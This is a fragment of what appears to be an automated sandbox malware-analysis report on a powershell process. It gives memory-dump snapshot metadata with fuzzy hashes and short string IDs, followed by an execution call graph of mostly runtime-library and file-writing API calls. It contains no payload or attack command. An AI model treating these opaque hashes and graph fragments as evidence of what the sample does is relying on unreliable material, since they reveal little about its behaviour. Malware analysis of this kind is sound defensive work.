                    • Opcode ID: 83e59e036582c281c740cefaa3410da79281807a559c7bae1b80d45dd6a3fc39
                    • Instruction ID: 000a246d0816b32de4200319522a07ad045fdc49973562a7f700212afd5aba58
                    • Opcode Fuzzy Hash: 83e59e036582c281c740cefaa3410da79281807a559c7bae1b80d45dd6a3fc39
                    • Instruction Fuzzy Hash: 38F14731F04344DFDB65AE79A8047AABBF2EF85315F2484AAD805CF291DB31C845C7A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                    • API String ID: 0-2890353280
                    • Opcode ID: cb3d9c1b32ed6d856da704c8177c173e76d8da6169d3da341cf255af28abdb02
                    • Instruction ID: 4fd028ef61cdd65f8a9f91c7616ae01af12848725eda2c8bd7e130fe1ce41ae1
                    • Opcode Fuzzy Hash: cb3d9c1b32ed6d856da704c8177c173e76d8da6169d3da341cf255af28abdb02
                    • Instruction Fuzzy Hash: C692A474E00314CFDB64EB68D855BAABBF2AF88344F1494A9D509AF381CB35DC85CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-3512890053
                    • Opcode ID: abf2fd51d596c53bbe11abc28111c7994d4d5b10783287c7c82cbac45639b3e2
                    • Instruction ID: 56b9c57bf39772c2069a652f385bf550d8c15d576da2805fe975137dc048e491
                    • Opcode Fuzzy Hash: abf2fd51d596c53bbe11abc28111c7994d4d5b10783287c7c82cbac45639b3e2
                    • Instruction Fuzzy Hash: 9AF14835F003148FCB68AF79E4546ABBBE2AFC5215B2484AAD509EF342DF35D841C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                    • API String ID: 0-2822668367
                    • Opcode ID: 9717ac74b2b03546731ee411a768f4e71a8e6badcc211a13c8569a8a2a9de7e3
                    • Instruction ID: 29f16e7f703f472f76c9ce4fafe44bc42f6278240540f9f6d90796980d95d9ec
                    • Opcode Fuzzy Hash: 9717ac74b2b03546731ee411a768f4e71a8e6badcc211a13c8569a8a2a9de7e3
                    • Instruction Fuzzy Hash: F9D1A074E002088FDB58EB68D455BAFBBB3AF88305F24C469D9056F385CB75EC858B91
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q
                    • API String ID: 0-1420252700
                    • Opcode ID: 852c32cded49af0f635cdfa592d0e6571d23f7a3cf51c6adc541869196c9df9e
                    • Instruction ID: c6b3fb41abda0aae2f336498a9133cd5f190c252213df5f3872a6a5b238947a5
                    • Opcode Fuzzy Hash: 852c32cded49af0f635cdfa592d0e6571d23f7a3cf51c6adc541869196c9df9e
                    • Instruction Fuzzy Hash: BC126735F04314CFCB69AA79A8157AABBA29FC5315F1480BAD905DF381DF35C882C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Hbq$$^q$$^q
                    • API String ID: 0-1611274095
                    • Opcode ID: 7c538142569981061baa93c8f0c914d4757163a7c73b57a0aaa2ff073ea5362e
                    • Instruction ID: 3cfa5c2fc8895a9c344525a6e05ae1bf22c187daed7846cf522bff460acec5ab
                    • Opcode Fuzzy Hash: 7c538142569981061baa93c8f0c914d4757163a7c73b57a0aaa2ff073ea5362e
                    • Instruction Fuzzy Hash: 37224D34B002289FCB25DB24D8947AEB7B2BF89315F1184E9D80AAB355DF359D81CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$$^q
                    • API String ID: 0-953868773
                    • Opcode ID: 9bed57fb95d02fd739d2486ad6853fc9e3ed920cf82550a9dba8a1105fc621c8
                    • Instruction ID: bd35f191197f984fe126bc618b7bc6fabceea4c1b19b00e7a30f4a75e5907cfb
                    • Opcode Fuzzy Hash: 9bed57fb95d02fd739d2486ad6853fc9e3ed920cf82550a9dba8a1105fc621c8
                    • Instruction Fuzzy Hash: 8D915830F043048FCB69AB3898153AB7BE2AF85309F1484AAD545EF396DE36CC44C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q
                    • API String ID: 0-1196845430
                    • Opcode ID: 4377b062537ab3fcd9904810a641f7b87d4d2edb0f5c3e83a9d323aa6568ac48
                    • Instruction ID: 8ea9f29f718af4c5a78f9b3b591cb223697a019b7e189f0c61852223036002a6
                    • Opcode Fuzzy Hash: 4377b062537ab3fcd9904810a641f7b87d4d2edb0f5c3e83a9d323aa6568ac48
                    • Instruction Fuzzy Hash: 70B1BF74E003089FDB58EF68D854B9ABBB2AF88309F24C459D9056F385CB75EC85CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q
                    • API String ID: 0-2697143702
                    • Opcode ID: 3a76b3e06151ea2c21c7b4a61e7c366d57aaa04c26403df35f95b485a8aa2f36
                    • Instruction ID: 2a41c0963a98f234bc8d566965ca6f5a3d698c7a95eb4a0cf440a67a828cc1e8
                    • Opcode Fuzzy Hash: 3a76b3e06151ea2c21c7b4a61e7c366d57aaa04c26403df35f95b485a8aa2f36
                    • Instruction Fuzzy Hash: 4F723D74A00314CFDB54DB68C459BAABBF2AF8A304F24C069D9099F395DB76EC45CB81
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q
                    • API String ID: 0-2697143702
                    • Opcode ID: c54dd402c834f1dbbf92db492513273bb1bc7fb1fccd17ef72507d537e84df75
                    • Instruction ID: ca5a8ec5f41415572850ec797488d44d39b6d6a0d7bee394c9e417453f822660
                    • Opcode Fuzzy Hash: c54dd402c834f1dbbf92db492513273bb1bc7fb1fccd17ef72507d537e84df75
                    • Instruction Fuzzy Hash: A7F19074B002149FDB64EB68C955BAABBF3EF88344F1080A9D5096F381CB75ED818F91
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q
                    • API String ID: 0-1614139903
                    • Opcode ID: 1c490e29235a847b8ffd2c827c3a2c5e7d90904e78f58f132e7bf88e11c71164
                    • Instruction ID: 52cee0a77f879983f0236871761cb90e7f69040d1c0538159b75809beba10a99
                    • Opcode Fuzzy Hash: 1c490e29235a847b8ffd2c827c3a2c5e7d90904e78f58f132e7bf88e11c71164
                    • Instruction Fuzzy Hash: 0A524B74A00314CFDB94DB68C455B9ABBB2EF8A304F14C0A9D9099F395DB76EC46CB81
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q
                    • API String ID: 0-1614139903
                    • Opcode ID: 7f7852c0a88aa20db8e5657f483552c29bcfeaa95420803ad6bfebd512cdc57e
                    • Instruction ID: 1820e98188f157159bcb32783a784365d57315c411092942794782b28e899733
                    • Opcode Fuzzy Hash: 7f7852c0a88aa20db8e5657f483552c29bcfeaa95420803ad6bfebd512cdc57e
                    • Instruction Fuzzy Hash: EA412530F00300CFDBA4EE34A45576B7BE2AF85258B1490A5D601BF257D736DC44C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP^q
                    • API String ID: 0-2862610199
                    • Opcode ID: 8a64954335e48946bfac965e8c906209b60a21c67fd2fc566213bea9df95690f
                    • Instruction ID: d64cae23407023c02007a2f7269e48500067b0ae9b8cb78bff4b47ea687f3fa2
                    • Opcode Fuzzy Hash: 8a64954335e48946bfac965e8c906209b60a21c67fd2fc566213bea9df95690f
                    • Instruction Fuzzy Hash: A741E171F05380DFD7529F24A814A66BFF1AF86304F09C8DAD4849F292CA319C46CBA2
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f1f7e30a241573dcdd752dacbfaa5e326a503ec47075058213cc02bdf3d368b
                    • Instruction ID: 8aa049b5e85884cc57c01c0d08736ccbbfb0b0c313f8f4d4c8651c8b3aa6157a
                    • Opcode Fuzzy Hash: 2f1f7e30a241573dcdd752dacbfaa5e326a503ec47075058213cc02bdf3d368b
                    • Instruction Fuzzy Hash: A4122C34A00314CFDB94EB68C555BAABBB2EF85304F25C0A9D9099F391DB72EC45CB81
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84dd1c8f07a4a4276164c464e7f8a249b4a60e34fc011bee526e5a81238673f5
                    • Instruction ID: c98dd715b43b831df557be8ff659661811feced7cfd83481a119e8750e626f29
                    • Opcode Fuzzy Hash: 84dd1c8f07a4a4276164c464e7f8a249b4a60e34fc011bee526e5a81238673f5
                    • Instruction Fuzzy Hash: 32217C317003159FDBA83579A845B377AE69FC4759F20843AFA0ACB381CD35D942C3A1

                    Execution Graph

                    Execution Coverage:2.5%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:2%
                    Total number of Nodes:1648
                    Total number of Limit Nodes:5
22798c7b RtlEnterCriticalSection 7413->7431 7416 22799af9 7414->7416 7418 227962ac _abort 26 API calls 7416->7418 7417 22799a89 7419 22799aba 7417->7419 7420 22799aa5 7417->7420 7418->7425 7432 22799b0d 7419->7432 7422 22796368 __dosmaperr 20 API calls 7420->7422 7424 22799aaa 7422->7424 7423 22799ab5 7483 22799ae4 7423->7483 7426 22796355 __dosmaperr 20 API calls 7424->7426 7425->7377 7426->7423 7429 22795b7a __dosmaperr 20 API calls 7428->7429 7430 2279635a 7429->7430 7430->7411 7431->7417 7433 22799b3b 7432->7433 7470 22799b34 7432->7470 7434 22799b3f 7433->7434 7435 22799b5e 7433->7435 7436 22796355 __dosmaperr 20 API calls 7434->7436 7439 22799baf 7435->7439 7440 22799b92 7435->7440 7438 22799b44 7436->7438 7437 22792ada _ValidateLocalCookies 5 API calls 7441 22799d15 7437->7441 7442 22796368 __dosmaperr 20 API calls 7438->7442 7449 22799bc5 7439->7449 7486 2279a00b 7439->7486 7443 22796355 __dosmaperr 20 API calls 7440->7443 7441->7423 7444 22799b4b 7442->7444 7447 22799b97 7443->7447 7448 227962ac _abort 26 API calls 7444->7448 7451 22796368 __dosmaperr 20 API calls 7447->7451 7448->7470 7489 227996b2 7449->7489 7452 22799b9f 7451->7452 7455 227962ac _abort 26 API calls 7452->7455 7453 22799c0c 7456 22799c20 7453->7456 7457 22799c66 WriteFile 7453->7457 7454 22799bd3 7458 22799bf9 7454->7458 7459 22799bd7 7454->7459 7455->7470 7462 22799c28 7456->7462 7463 22799c56 7456->7463 7460 22799c89 GetLastError 7457->7460 7465 22799bef 7457->7465 7501 22799492 GetConsoleCP 7458->7501 7464 22799ccd 7459->7464 7496 22799645 7459->7496 7460->7465 7466 22799c2d 7462->7466 7467 22799c46 7462->7467 7527 22799728 7463->7527 7464->7470 7471 22796368 __dosmaperr 20 API calls 7464->7471 7465->7464 7465->7470 7474 22799ca9 7465->7474 7466->7464 7512 22799807 7466->7512 7519 227998f5 7467->7519 7470->7437 7473 22799cf2 7471->7473 7476 22796355 __dosmaperr 20 API calls 7473->7476 7477 22799cb0 7474->7477 7478 22799cc4 7474->7478 7476->7470 7479 22796368 __dosmaperr 20 API calls 
7477->7479 7534 22796332 7478->7534 7481 22799cb5 7479->7481 7482 22796355 __dosmaperr 20 API calls 7481->7482 7482->7470 7575 22798c9e RtlLeaveCriticalSection 7483->7575 7485 22799aea 7485->7425 7539 22799f8d 7486->7539 7561 22798dbc 7489->7561 7491 227996c2 7492 227996c7 7491->7492 7493 22795af6 _abort 38 API calls 7491->7493 7492->7453 7492->7454 7494 227996ea 7493->7494 7494->7492 7495 22799708 GetConsoleMode 7494->7495 7495->7492 7497 2279969f 7496->7497 7498 2279966a 7496->7498 7497->7465 7498->7497 7499 2279a181 WriteConsoleW CreateFileW 7498->7499 7500 227996a1 GetLastError 7498->7500 7499->7498 7500->7497 7502 227994f5 7501->7502 7511 22799607 7501->7511 7506 2279957b WideCharToMultiByte 7502->7506 7508 227979e6 40 API calls __fassign 7502->7508 7510 227995d2 WriteFile 7502->7510 7502->7511 7570 22797c19 7502->7570 7503 22792ada _ValidateLocalCookies 5 API calls 7505 22799641 7503->7505 7505->7465 7507 227995a1 WriteFile 7506->7507 7506->7511 7507->7502 7509 2279962a GetLastError 7507->7509 7508->7502 7509->7511 7510->7502 7510->7509 7511->7503 7513 22799816 7512->7513 7514 227998d8 7513->7514 7516 22799894 WriteFile 7513->7516 7515 22792ada _ValidateLocalCookies 5 API calls 7514->7515 7517 227998f1 7515->7517 7516->7513 7518 227998da GetLastError 7516->7518 7517->7465 7518->7514 7526 22799904 7519->7526 7520 22799a0f 7521 22792ada _ValidateLocalCookies 5 API calls 7520->7521 7522 22799a1e 7521->7522 7522->7465 7523 22799986 WideCharToMultiByte 7524 227999bb WriteFile 7523->7524 7525 22799a07 GetLastError 7523->7525 7524->7525 7524->7526 7525->7520 7526->7520 7526->7523 7526->7524 7531 22799737 7527->7531 7528 227997ea 7530 22792ada _ValidateLocalCookies 5 API calls 7528->7530 7529 227997a9 WriteFile 7529->7531 7532 227997ec GetLastError 7529->7532 7533 22799803 7530->7533 7531->7528 7531->7529 7532->7528 7533->7465 7535 22796355 __dosmaperr 20 API calls 7534->7535 7536 2279633d __dosmaperr 7535->7536 7537 22796368 __dosmaperr 20 API calls 7536->7537 7538 
22796350 7537->7538 7538->7470 7548 22798d52 7539->7548 7541 22799f9f 7542 22799fb8 SetFilePointerEx 7541->7542 7543 22799fa7 7541->7543 7545 22799fac 7542->7545 7546 22799fd0 GetLastError 7542->7546 7544 22796368 __dosmaperr 20 API calls 7543->7544 7544->7545 7545->7449 7547 22796332 __dosmaperr 20 API calls 7546->7547 7547->7545 7549 22798d5f 7548->7549 7551 22798d74 7548->7551 7550 22796355 __dosmaperr 20 API calls 7549->7550 7552 22798d64 7550->7552 7553 22796355 __dosmaperr 20 API calls 7551->7553 7555 22798d99 7551->7555 7554 22796368 __dosmaperr 20 API calls 7552->7554 7556 22798da4 7553->7556 7557 22798d6c 7554->7557 7555->7541 7558 22796368 __dosmaperr 20 API calls 7556->7558 7557->7541 7559 22798dac 7558->7559 7560 227962ac _abort 26 API calls 7559->7560 7560->7557 7562 22798dc9 7561->7562 7563 22798dd6 7561->7563 7564 22796368 __dosmaperr 20 API calls 7562->7564 7565 22798de2 7563->7565 7566 22796368 __dosmaperr 20 API calls 7563->7566 7567 22798dce 7564->7567 7565->7491 7568 22798e03 7566->7568 7567->7491 7569 227962ac _abort 26 API calls 7568->7569 7569->7567 7571 22795af6 _abort 38 API calls 7570->7571 7572 22797c24 7571->7572 7573 22797a00 __fassign 38 API calls 7572->7573 7574 22797c34 7573->7574 7574->7502 7575->7485 7579 2279ad24 7576->7579 7578 2279adca 7578->7400 7580 2279ad30 ___DestructExceptionObject 7579->7580 7590 22798c7b RtlEnterCriticalSection 7580->7590 7582 2279ad3e 7583 2279ad70 7582->7583 7584 2279ad65 7582->7584 7586 22796368 __dosmaperr 20 API calls 7583->7586 7591 2279ae4d 7584->7591 7587 2279ad6b 7586->7587 7606 2279ad9a 7587->7606 7589 2279ad8d _abort 7589->7578 7590->7582 7592 22798d52 26 API calls 7591->7592 7595 2279ae5d 7592->7595 7593 2279ae63 7609 22798cc1 7593->7609 7595->7593 7598 22798d52 26 API calls 7595->7598 7605 2279ae95 7595->7605 7596 22798d52 26 API calls 7599 2279aea1 CloseHandle 7596->7599 7600 2279ae8c 7598->7600 7599->7593 7601 2279aead GetLastError 7599->7601 7604 22798d52 26 API calls 7600->7604 7601->7593 
7602 22796332 __dosmaperr 20 API calls 7603 2279aedd 7602->7603 7603->7587 7604->7605 7605->7593 7605->7596 7618 22798c9e RtlLeaveCriticalSection 7606->7618 7608 2279ada4 7608->7589 7610 22798d37 7609->7610 7613 22798cd0 7609->7613 7611 22796368 __dosmaperr 20 API calls 7610->7611 7612 22798d3c 7611->7612 7614 22796355 __dosmaperr 20 API calls 7612->7614 7613->7610 7617 22798cfa 7613->7617 7615 22798d27 7614->7615 7615->7602 7615->7603 7616 22798d21 SetStdHandle 7616->7615 7617->7615 7617->7616 7618->7608 7619->7374 7620->7354 6487 2279284f 6490 22792882 6487->6490 6493 22793550 6490->6493 6492 2279285d 6494 2279355d 6493->6494 6497 2279358a 6493->6497 6495 227947e5 ___std_exception_copy 21 API calls 6494->6495 6494->6497 6496 2279357a 6495->6496 6496->6497 6499 2279544d 6496->6499 6497->6492 6500 22795468 6499->6500 6501 2279545a 6499->6501 6502 22796368 __dosmaperr 20 API calls 6500->6502 6501->6500 6503 2279547f 6501->6503 6507 22795470 6502->6507 6505 2279547a 6503->6505 6506 22796368 __dosmaperr 20 API calls 6503->6506 6505->6497 6506->6507 6508 227962ac 6507->6508 6511 22796231 6508->6511 6510 227962b8 6510->6505 6512 22795b7a __dosmaperr 20 API calls 6511->6512 6513 22796247 6512->6513 6514 22796255 6513->6514 6515 227962a6 6513->6515 6519 22792ada _ValidateLocalCookies 5 API calls 6514->6519 6522 227962bc IsProcessorFeaturePresent 6515->6522 6517 227962ab 6518 22796231 _abort 26 API calls 6517->6518 6520 227962b8 6518->6520 6521 2279627c 6519->6521 6520->6510 6521->6510 6523 227962c7 6522->6523 6526 227960e2 6523->6526 6527 227960fe ___scrt_fastfail 6526->6527 6528 2279612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6527->6528 6531 227961fb ___scrt_fastfail 6528->6531 6529 22792ada _ValidateLocalCookies 5 API calls 6530 22796219 GetCurrentProcess TerminateProcess 6529->6530 6530->6517 6531->6529 6532 2279724e GetProcessHeap 6533 22798640 6536 22798657 6533->6536 6537 22798679 6536->6537 6538 22798665 6536->6538 6540 22798681 
6537->6540 6541 22798693 6537->6541 6539 22796368 __dosmaperr 20 API calls 6538->6539 6542 2279866a 6539->6542 6543 22796368 __dosmaperr 20 API calls 6540->6543 6548 22798652 6541->6548 6549 227954a7 6541->6549 6546 227962ac _abort 26 API calls 6542->6546 6544 22798686 6543->6544 6547 227962ac _abort 26 API calls 6544->6547 6546->6548 6547->6548 6550 227954ba 6549->6550 6551 227954c4 6549->6551 6550->6548 6551->6550 6557 22795af6 GetLastError 6551->6557 6553 227954e5 6577 22797a00 6553->6577 6558 22795b12 6557->6558 6559 22795b0c 6557->6559 6561 2279637b _abort 20 API calls 6558->6561 6563 22795b61 SetLastError 6558->6563 6560 22795e08 _abort 11 API calls 6559->6560 6560->6558 6562 22795b24 6561->6562 6564 22795b2c 6562->6564 6565 22795e5e _abort 11 API calls 6562->6565 6563->6553 6566 2279571e _free 20 API calls 6564->6566 6567 22795b41 6565->6567 6568 22795b32 6566->6568 6567->6564 6569 22795b48 6567->6569 6570 22795b6d SetLastError 6568->6570 6571 2279593c _abort 20 API calls 6569->6571 6585 227955a8 6570->6585 6572 22795b53 6571->6572 6575 2279571e _free 20 API calls 6572->6575 6576 22795b5a 6575->6576 6576->6563 6576->6570 6578 227954fe 6577->6578 6579 22797a13 6577->6579 6581 22797a2d 6578->6581 6579->6578 6653 22797f0f 6579->6653 6582 22797a40 6581->6582 6583 22797a55 6581->6583 6582->6583 6788 22796d7e 6582->6788 6583->6550 6596 22797613 6585->6596 6587 227955b8 6589 227955e0 6587->6589 6590 227955c2 IsProcessorFeaturePresent 6587->6590 6626 22794bc1 6589->6626 6592 227955cd 6590->6592 6594 227960e2 _abort 8 API calls 6592->6594 6594->6589 6629 22797581 6596->6629 6599 2279766e 6600 2279767a _abort 6599->6600 6601 22795b7a __dosmaperr 20 API calls 6600->6601 6604 227976a7 _abort 6600->6604 6607 227976a1 _abort 6600->6607 6601->6607 6602 227976f3 6603 22796368 __dosmaperr 20 API calls 6602->6603 6605 227976f8 6603->6605 6611 2279771f 6604->6611 6643 22795671 RtlEnterCriticalSection 6604->6643 6608 227962ac _abort 26 API calls 6605->6608 6606 2279bdc9 _abort 
5 API calls 6609 22797875 6606->6609 6607->6602 6607->6604 6625 227976d6 6607->6625 6608->6625 6609->6587 6612 2279777e 6611->6612 6614 22797776 6611->6614 6622 227977a9 6611->6622 6644 227956b9 RtlLeaveCriticalSection 6611->6644 6612->6622 6645 22797665 6612->6645 6617 22794bc1 _abort 28 API calls 6614->6617 6617->6612 6620 22795af6 _abort 38 API calls 6623 2279780c 6620->6623 6621 22797665 _abort 38 API calls 6621->6622 6648 2279782e 6622->6648 6624 22795af6 _abort 38 API calls 6623->6624 6623->6625 6624->6625 6625->6606 6627 2279499b _abort 28 API calls 6626->6627 6628 22794bd2 6627->6628 6632 22797527 6629->6632 6631 227955ad 6631->6587 6631->6599 6633 22797533 ___DestructExceptionObject 6632->6633 6638 22795671 RtlEnterCriticalSection 6633->6638 6635 22797541 6639 22797575 6635->6639 6637 22797568 _abort 6637->6631 6638->6635 6642 227956b9 RtlLeaveCriticalSection 6639->6642 6641 2279757f 6641->6637 6642->6641 6643->6611 6644->6614 6646 22795af6 _abort 38 API calls 6645->6646 6647 2279766a 6646->6647 6647->6621 6649 227977fd 6648->6649 6650 22797834 6648->6650 6649->6620 6649->6623 6649->6625 6652 227956b9 RtlLeaveCriticalSection 6650->6652 6652->6649 6654 22797f1b ___DestructExceptionObject 6653->6654 6655 22795af6 _abort 38 API calls 6654->6655 6656 22797f24 6655->6656 6657 22797f72 _abort 6656->6657 6665 22795671 RtlEnterCriticalSection 6656->6665 6657->6578 6659 22797f42 6666 22797f86 6659->6666 6664 227955a8 _abort 38 API calls 6664->6657 6665->6659 6667 22797f94 __fassign 6666->6667 6669 22797f56 6666->6669 6667->6669 6673 22797cc2 6667->6673 6670 22797f75 6669->6670 6787 227956b9 RtlLeaveCriticalSection 6670->6787 6672 22797f69 6672->6657 6672->6664 6675 22797d42 6673->6675 6676 22797cd8 6673->6676 6678 2279571e _free 20 API calls 6675->6678 6700 22797d90 6675->6700 6676->6675 6682 2279571e _free 20 API calls 6676->6682 6683 22797d0b 6676->6683 6677 22797d9e 6688 22797dfe 6677->6688 6697 2279571e 20 API calls _free 6677->6697 6679 22797d64 6678->6679 
6680 2279571e _free 20 API calls 6679->6680 6684 22797d77 6680->6684 6681 2279571e _free 20 API calls 6687 22797d37 6681->6687 6689 22797d00 6682->6689 6685 2279571e _free 20 API calls 6683->6685 6699 22797d2d 6683->6699 6686 2279571e _free 20 API calls 6684->6686 6690 22797d22 6685->6690 6691 22797d85 6686->6691 6692 2279571e _free 20 API calls 6687->6692 6693 2279571e _free 20 API calls 6688->6693 6701 227990ba 6689->6701 6729 227991b8 6690->6729 6696 2279571e _free 20 API calls 6691->6696 6692->6675 6698 22797e04 6693->6698 6696->6700 6697->6677 6698->6669 6699->6681 6741 22797e35 6700->6741 6702 227990cb 6701->6702 6728 227991b4 6701->6728 6703 227990dc 6702->6703 6705 2279571e _free 20 API calls 6702->6705 6704 227990ee 6703->6704 6706 2279571e _free 20 API calls 6703->6706 6707 22799100 6704->6707 6708 2279571e _free 20 API calls 6704->6708 6705->6703 6706->6704 6709 22799112 6707->6709 6710 2279571e _free 20 API calls 6707->6710 6708->6707 6711 22799124 6709->6711 6713 2279571e _free 20 API calls 6709->6713 6710->6709 6712 22799136 6711->6712 6714 2279571e _free 20 API calls 6711->6714 6715 22799148 6712->6715 6716 2279571e _free 20 API calls 6712->6716 6713->6711 6714->6712 6717 2279915a 6715->6717 6718 2279571e _free 20 API calls 6715->6718 6716->6715 6719 2279916c 6717->6719 6721 2279571e _free 20 API calls 6717->6721 6718->6717 6720 2279917e 6719->6720 6722 2279571e _free 20 API calls 6719->6722 6723 22799190 6720->6723 6724 2279571e _free 20 API calls 6720->6724 6721->6719 6722->6720 6725 227991a2 6723->6725 6726 2279571e _free 20 API calls 6723->6726 6724->6723 6727 2279571e _free 20 API calls 6725->6727 6725->6728 6726->6725 6727->6728 6728->6683 6730 2279921d 6729->6730 6731 227991c5 6729->6731 6730->6699 6732 227991d5 6731->6732 6733 2279571e _free 20 API calls 6731->6733 6734 227991e7 6732->6734 6735 2279571e _free 20 API calls 6732->6735 6733->6732 6736 227991f9 6734->6736 6737 2279571e _free 20 API calls 6734->6737 6735->6734 6738 2279920b 
6736->6738 6739 2279571e _free 20 API calls 6736->6739 6737->6736 6738->6730 6740 2279571e _free 20 API calls 6738->6740 6739->6738 6740->6730 6742 22797e42 6741->6742 6746 22797e60 6741->6746 6742->6746 6747 2279925d 6742->6747 6745 2279571e _free 20 API calls 6745->6746 6746->6677 6748 22797e5a 6747->6748 6749 2279926e 6747->6749 6748->6745 6783 22799221 6749->6783 6752 22799221 __fassign 20 API calls 6753 22799281 6752->6753 6754 22799221 __fassign 20 API calls 6753->6754 6755 2279928c 6754->6755 6756 22799221 __fassign 20 API calls 6755->6756 6757 22799297 6756->6757 6758 22799221 __fassign 20 API calls 6757->6758 6759 227992a5 6758->6759 6760 2279571e _free 20 API calls 6759->6760 6761 227992b0 6760->6761 6762 2279571e _free 20 API calls 6761->6762 6763 227992bb 6762->6763 6764 2279571e _free 20 API calls 6763->6764 6765 227992c6 6764->6765 6766 22799221 __fassign 20 API calls 6765->6766 6767 227992d4 6766->6767 6768 22799221 __fassign 20 API calls 6767->6768 6769 227992e2 6768->6769 6770 22799221 __fassign 20 API calls 6769->6770 6771 227992f3 6770->6771 6772 22799221 __fassign 20 API calls 6771->6772 6773 22799301 6772->6773 6774 22799221 __fassign 20 API calls 6773->6774 6775 2279930f 6774->6775 6776 2279571e _free 20 API calls 6775->6776 6777 2279931a 6776->6777 6778 2279571e _free 20 API calls 6777->6778 6779 22799325 6778->6779 6780 2279571e _free 20 API calls 6779->6780 6781 22799330 6780->6781 6782 2279571e _free 20 API calls 6781->6782 6782->6748 6784 22799258 6783->6784 6785 22799248 6783->6785 6784->6752 6785->6784 6786 2279571e _free 20 API calls 6785->6786 6786->6785 6787->6672 6789 22796d8a ___DestructExceptionObject 6788->6789 6790 22795af6 _abort 38 API calls 6789->6790 6795 22796d94 6790->6795 6792 22796e18 _abort 6792->6583 6794 227955a8 _abort 38 API calls 6794->6795 6795->6792 6795->6794 6796 2279571e _free 20 API calls 6795->6796 6797 22795671 RtlEnterCriticalSection 6795->6797 6798 22796e0f 6795->6798 6796->6795 6797->6795 6801 227956b9 
